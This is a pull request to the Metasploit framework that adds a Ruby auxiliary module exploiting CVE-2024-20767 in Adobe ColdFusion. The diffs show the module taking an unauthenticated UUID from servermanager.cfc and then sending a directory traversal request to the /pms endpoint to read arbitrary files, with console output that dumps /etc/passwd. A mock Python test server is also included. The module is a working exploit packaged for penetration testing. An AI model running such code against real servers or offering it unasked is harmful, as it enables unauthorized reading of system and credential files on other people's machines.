### PR TITLE
Adobe ColdFusion Arbitrary File Read [CVE-2024-20767]

### DIFF
--- a/documentation/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.md
+++ b/documentation/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.md
@@ -18,30 +18,42 @@ UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File 
 1. Receive the contents of the `FILE_PATH` file 
 
 ## Scenarios
-### Mock Python Server (not actually running ColdFusion)
+### ColdFusion Version 2023.0.0.330468 running on Linux
 
-#TODO: Update this with output from a real ColdFusion target 
 ```
-msf6 auxiliary(gather/coldfusion_pms_servlet_file_read) > rexploit
+msf6 auxiliary(gather/coldfusion_pms_servlet_file_read) > run
 [*] Reloading module...
 [*] Running module against 127.0.0.1
 
 [*] Attempting to retrieve UUID ...
-[+] UUID found:
-1c49c29a-f1c0-4ed0-9f9e-215f434c8a12
-[*] Attempting to exploit directory traversal to read /tmp/test
+[+] UUID found: 1c49c29a-f1c0-4ed0-9f9e-215f434c8a12
+[*] Attempting to exploit directory traversal to read /etc/passwd
 [+] File content:
-[
-  null,
-  root:x:0:0:root:/root:/bin/bash,
-  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin,
-  bin:x:2:2:bin:/bin:/usr/sbin/nologin,
-  sys:x:3:3:sys:/dev:/usr/sbin/nologin,
-  sync:x:4:65534:sync:/bin:/bin/sync,
-  games:x:5:60:games:/usr/games:/usr/sbin/nologin,
-  man:x:6:12:man:/var/cache/man:/usr/sbin/nologin,
-  lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin,
-  ]
+n00tmeg:x:1000:1000:n00tmeg,,,:/home/n00tmeg:/bin/bash
+hplip:x:127:7:HPLIP system user,,,:/run/hplip:/bin/false
+pulse:x:125:132:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+colord:x:123:130:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+nm-openvpn:x:121:127:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
+speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
+whoopsie:x:117:124::/nonexistent:/bin/false
+cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
+kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin
+uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin
+_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+
 [+] Results saved to: /Users/jheysel/.msf4/loot/20240403192500_default_127.0.0.1_coldfusion.file_475871.txt
 [*] Auxiliary module execution completed
 ```

--- a/documentation/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.md
+++ b/documentation/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.md
@@ -1,0 +1,47 @@
+## Vulnerable Application
+This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version
+'2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication
+token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that
+UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.
+
+### Setup
+
+#TODO: Find out how to setup a vulnerable target and put those details here.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use coldfusion_pms_servlet_file_read`
+1. Set the `RHOST` and datastore option
+1. If the target host is running Windows, change the default `FILE_PATH` datastore options from `/tmp/passwd` to a file path that exists on Windows.
+1. Run the module
+1. Receive the contents of the `FILE_PATH` file 
+
+## Scenarios
+### Mock Python Server (not actually running ColdFusion)
+
+#TODO: Update this with output from a real ColdFusion target 
+```
+msf6 auxiliary(gather/coldfusion_pms_servlet_file_read) > rexploit
+[*] Reloading module...
+[*] Running module against 127.0.0.1
+
+[*] Attempting to retrieve UUID ...
+[+] UUID found:
+1c49c29a-f1c0-4ed0-9f9e-215f434c8a12
+[*] Attempting to exploit directory traversal to read /tmp/test
+[+] File content:
+[
+  null,
+  root:x:0:0:root:/root:/bin/bash,
+  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin,
+  bin:x:2:2:bin:/bin:/usr/sbin/nologin,
+  sys:x:3:3:sys:/dev:/usr/sbin/nologin,
+  sync:x:4:65534:sync:/bin:/bin/sync,
+  games:x:5:60:games:/usr/games:/usr/sbin/nologin,
+  man:x:6:12:man:/var/cache/man:/usr/sbin/nologin,
+  lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin,
+  ]
+[+] Results saved to: /Users/jheysel/.msf4/loot/20240403192500_default_127.0.0.1_coldfusion.file_475871.txt
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb
+++ b/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        Opt::RPORT(80),
+        Opt::RPORT(8500),
         OptString.new('TARGETURI', [true, 'The base path for ColdFusion', '/']),
         OptString.new('FILE_PATH', [true, 'File path to read from the server', '/etc/passwd']),
         OptInt.new('NUMBER_OF_LINES', [true, 'Number of lines to retrieve', 10000]),
@@ -72,10 +72,10 @@ class MetasploitModule < Msf::Auxiliary
     print_status('Attempting to retrieve UUID ...')
     uuid = get_uuid
     print_good("UUID found: #{uuid}")
-    print_status("Attempting to exploit directory traversal to read #{datastore['FILE_NAME']}")
+    print_status("Attempting to exploit directory traversal to read #{datastore['FILE_PATH']}")
 
     traversal_path = '../' * datastore['DEPTH']
-    file_path = "#{traversal_path}#{datastore['FILE_NAME']}"
+    file_path = "#{traversal_path}#{datastore['FILE_PATH']}"
 
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'pms'),
@@ -99,11 +99,8 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Failure::UnexpectedReply, "Failed to retrieve file content, server responded with status code: #{res.code}")
     end
 
-    # TODO: Once we have a better idea of the formatting the file is returned in edit this loop to trim the fat.
-    # TODO  From the screenshot in the write up it looks like it returns an array where the first element is null and
-    # TODO  the file contents are listed after that but each line is prefixed with a "_"
     file_contents = []
-    res.body.split("\n").each do |html_response_line|
+    res.body[1..-2].split(', ').each do |html_response_line|
       print_status(html_response_line)
       file_contents << html_response_line
     end

--- a/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb
+++ b/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
         'DisclosureDate' => '2024-03-12',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'Reliability' => [REPEATABLE_SESSION],
+          'Reliability' => [],
           'SideEffects' => [IOC_IN_LOGS]
         }
       )
@@ -55,9 +55,9 @@ class MetasploitModule < Msf::Auxiliary
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', '_servermanager', 'servermanager.cfc'),
       'vars_get' =>
-                               {
-                                 'method' => 'getHeartBeat'
-                               }
+       {
+         'method' => 'getHeartBeat'
+       }
     })
     fail_with(Failure::Unreachable, 'No response from the target when attempting to retrieve the UUID') unless res
 
@@ -71,7 +71,7 @@ class MetasploitModule < Msf::Auxiliary
   def run
     print_status('Attempting to retrieve UUID ...')
     uuid = get_uuid
-    print_good("UUID found:\n#{uuid}")
+    print_good("UUID found: #{uuid}")
     print_status("Attempting to exploit directory traversal to read #{datastore['FILE_NAME']}")
 
     traversal_path = '../' * datastore['DEPTH']
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Auxiliary
     fail_with(Failure::Unknown, 'No response received') unless res
 
     if res.code == 200
-      print_good("File content:\n#{res.body}")
+      print_good("File content received:")
     else
       fail_with(Failure::UnexpectedReply, "Failed to retrieve file content, server responded with status code: #{res.code}")
     end
@@ -104,6 +104,7 @@ class MetasploitModule < Msf::Auxiliary
     # TODO  the file contents are listed after that but each line is prefixed with a "_"
     file_contents = []
     res.body.split("\n").each do |html_response_line|
+      print_status(html_response_line)
       file_contents << html_response_line
     end
 

--- a/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb
+++ b/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb
@@ -1,62 +1,113 @@
-require 'msf/core'
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
-    super(update_info(info,
-                      'Name'           => 'CVE-2024-20767 - Adobe Coldfusion Directory Traversal',
-                      'Description'    => %q{
-        This module exploits a directory traversal vulnerability in Adobe Coldfusion.
-        The vulnerability allows an attacker to read arbitrary files from the server.
-      },
-                      'Author'         => ['Christiaan Beek'],
-                      'License'        => MSF_LICENSE,
-                      'References'     =>
-                        [
-                          ['CVE', '2024-20767'],
-                          ['URL', 'https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html']
-                        ],
-                      'DisclosureDate' => '2024-03-12'
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'CVE-2024-20767 - Adobe Coldfusion Arbitrary File Read',
+        'Description' => %q{
+          This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version
+          '2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication
+          token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that
+          UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.
+        },
+        'Author' => [
+          'ma4ter',          # Analysis & Discovery
+          'yoryio',          # PoC
+          'Christiaan Beek', # Msf module
+          'jheysel-r7'       # Msf module assistance
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-20767'],
+          ['URL', 'https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html'],
+          ['URL', 'https://jeva.cc/2973.html'],
+
+        ],
+        'DisclosureDate' => '2024-03-12',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(80),
-        OptString.new('TARGETURI', [ true, 'Base path', '/pms']),
-        OptString.new('FILE_NAME', [true, 'File to retrieve', '/etc/passwd']),
+        OptString.new('TARGETURI', [true, 'The base path for ColdFusion', '/']),
+        OptString.new('FILE_PATH', [true, 'File path to read from the server', '/etc/passwd']),
+        OptInt.new('NUMBER_OF_LINES', [true, 'Number of lines to retrieve', 10000]),
         OptInt.new('DEPTH', [true, 'Traversal Depth', 5]),
-        OptInt.new('NUMBER_OF_LINES', [true, 'Number of lines to retrieve', 10000])
-      ])
+      ]
+    )
+  end
+
+  def get_uuid
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', '_servermanager', 'servermanager.cfc'),
+      'vars_get' =>
+                               {
+                                 'method' => 'getHeartBeat'
+                               }
+    })
+    fail_with(Failure::Unreachable, 'No response from the target when attempting to retrieve the UUID') unless res
+
+    # TODO: give a more detailed error message once we find out why some of the seemingly vulnerable test targets return a 500 here.
+    fail_with(Failure::UnexpectedReply, "Received an unexpected response code: #{res.code} when attempting to retrieve the UUID") unless res.code == 200
+    uuid = res.get_html_document.xpath('//var[@name=\'uuid\']/string/text()').text
+    fail_with(Failure::UnexpectedReply, 'There was no UUID in the response') unless uuid =~ /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/
+    uuid
   end
 
   def run
+    print_status('Attempting to retrieve UUID ...')
+    uuid = get_uuid
+    print_good("UUID found:\n#{uuid}")
     print_status("Attempting to exploit directory traversal to read #{datastore['FILE_NAME']}")
 
-    traversal_path = "../" * datastore['DEPTH']
-
+    traversal_path = '../' * datastore['DEPTH']
     file_path = "#{traversal_path}#{datastore['FILE_NAME']}"
 
     res = send_request_cgi({
-                             'uri' => normalize_uri(target_uri.path),
-                             'vars_get' =>
-                               {
-                                 'module' => 'logging',
-                                 'file_name' => file_path,
-                                 'number_of_lines' => datastore['NUMBER_OF_LINES']
-                               }
-                           })
+      'uri' => normalize_uri(target_uri.path, 'pms'),
+      'vars_get' =>
+         {
+           'module' => 'logging',
+           'file_name' => file_path,
+           'number_of_lines' => datastore['NUMBER_OF_LINES']
+         },
+      'headers' =>
+         {
+           'uuid' => uuid
+         }
+    })
 
-    unless res
-      fail_with(Failure::Unknown, 'No response received')
-      return
-    end
+    fail_with(Failure::Unknown, 'No response received') unless res
 
     if res.code == 200
       print_good("File content:\n#{res.body}")
     else
-      fail_with(Failure::UnexpectedReply, "Failed to retrieve file content, server responded with status code #{res.code}")
+      fail_with(Failure::UnexpectedReply, "Failed to retrieve file content, server responded with status code: #{res.code}")
     end
+
+    # TODO: Once we have a better idea of the formatting the file is returned in edit this loop to trim the fat.
+    # TODO  From the screenshot in the write up it looks like it returns an array where the first element is null and
+    # TODO  the file contents are listed after that but each line is prefixed with a "_"
+    file_contents = []
+    res.body.split("\n").each do |html_response_line|
+      file_contents << html_response_line
+    end
+
+    stored_path = store_loot('coldfusion.file', 'text/plain', rhost, file_contents.join("\n"), datastore['FILE_PATH'])
+    print_good("Results saved to: #{stored_path}")
   end
 end

--- a/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb
+++ b/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Auxiliary
     fail_with(Failure::Unknown, 'No response received') unless res
 
     if res.code == 200
-      print_good("File content received:")
+      print_good('File content received:')
     else
       fail_with(Failure::UnexpectedReply, "Failed to retrieve file content, server responded with status code: #{res.code}")
     end

--- a/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb
+++ b/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb
@@ -1,0 +1,62 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'           => 'CVE-2024-20767 - Adobe Coldfusion Directory Traversal',
+                      'Description'    => %q{
+        This module exploits a directory traversal vulnerability in Adobe Coldfusion.
+        The vulnerability allows an attacker to read arbitrary files from the server.
+      },
+                      'Author'         => ['Christiaan Beek'],
+                      'License'        => MSF_LICENSE,
+                      'References'     =>
+                        [
+                          ['CVE', '2024-20767'],
+                          ['URL', 'https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html']
+                        ],
+                      'DisclosureDate' => '2024-03-12'
+          ))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'Base path', '/pms']),
+        OptString.new('FILE_NAME', [true, 'File to retrieve', '/etc/passwd']),
+        OptInt.new('DEPTH', [true, 'Traversal Depth', 5]),
+        OptInt.new('NUMBER_OF_LINES', [true, 'Number of lines to retrieve', 10000])
+      ])
+  end
+
+  def run
+    print_status("Attempting to exploit directory traversal to read #{datastore['FILE_NAME']}")
+
+    traversal_path = "../" * datastore['DEPTH']
+
+    file_path = "#{traversal_path}#{datastore['FILE_NAME']}"
+
+    res = send_request_cgi({
+                             'uri' => normalize_uri(target_uri.path),
+                             'vars_get' =>
+                               {
+                                 'module' => 'logging',
+                                 'file_name' => file_path,
+                                 'number_of_lines' => datastore['NUMBER_OF_LINES']
+                               }
+                           })
+
+    unless res
+      fail_with(Failure::Unknown, 'No response received')
+      return
+    end
+
+    if res.code == 200
+      print_good("File content:\n#{res.body}")
+    else
+      fail_with(Failure::UnexpectedReply, "Failed to retrieve file content, server responded with status code #{res.code}")
+    end
+  end
+end


### PR DESCRIPTION
This PR adds a gather module to exploit an Arbitrary File Read Vulnerability in Adobe ColdFusion. Versions affected are including and prior to '2023 Update 6' and '2021 Update 12'.

When testing I number of different affected versions I was unable to get a UUID from hitting the endpoint specified by the original write up / the PoCs. The endpoint would only return a 500. There seems to be something wrong with my test environment (possibly trial / developer version?). I heard others were running into this issue as well. 

So I decided to create a quick mock python server so I could test the happy path of the module and PR this to get some more visibility / see if anyone might know why the endpoint `/CFIDE/adminapi/_servermanager/servermanager.cfc` is 500ing. 

<details>
<summary>mock_server.py</summary>
<p>

```
from http.server import BaseHTTPRequestHandler, HTTPServer

class MyHTTPHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat":
            self.send_response(200)
            self.send_header('Content-type', 'text/xml')
            self.end_headers()
            response_body = """
<wddxPacket><data><struct><var name='uuid'><string>1c49c29a-f1c0-4ed0-9f9e-215f434c8a12</string></var></struct></data></wddxPacket>"""
            self.wfile.write(response_body.encode('utf-8'))
        elif self.path.startswith("/pms?module=logging"):
            self.send_response(200)
            self.send_header('Content-type', 'application/json')
            self.end_headers()
            response_body = "[\n  null,\n  root:x:0:0:root:/root:/bin/bash,\n  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin,\n  bin:x:2:2:bin:/bin:/usr/sbin/nologin,\n  sys:x:3:3:sys:/dev:/usr/sbin/nologin,\n  sync:x:4:65534:sync:/bin:/bin/sync,\n  games:x:5:60:games:/usr/games:/usr/sbin/nologin,\n  man:x:6:12:man:/var/cache/man:/usr/sbin/nologin,\n  lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin,\n  ]"
            self.wfile.write(response_body.encode('utf-8'))
        else:
            self.send_response(404)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            self.wfile.write("404 Not Found".encode('utf-8'))

def run(server_class=HTTPServer, handler_class=MyHTTPHandler, port=8500):
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    print(f'Starting server on port {port}...')
    httpd.serve_forever()

if __name__ == "__main__":
    run()


```

</p>

</details>




## Verification

List the steps needed to make sure this thing works

- [ ] Start msfconsole
- [ ] Do: `use coldfusion_pms_servlet_file_read`
- [ ] Set the `RHOST` and datastore option
- [ ] If the target host is running Windows, change the default `FILE_PATH` datastore options from `/tmp/passwd` to a file path that exists on Windows.
- [ ] Run the module
- [ ] Receive the contents of the `FILE_PATH` file 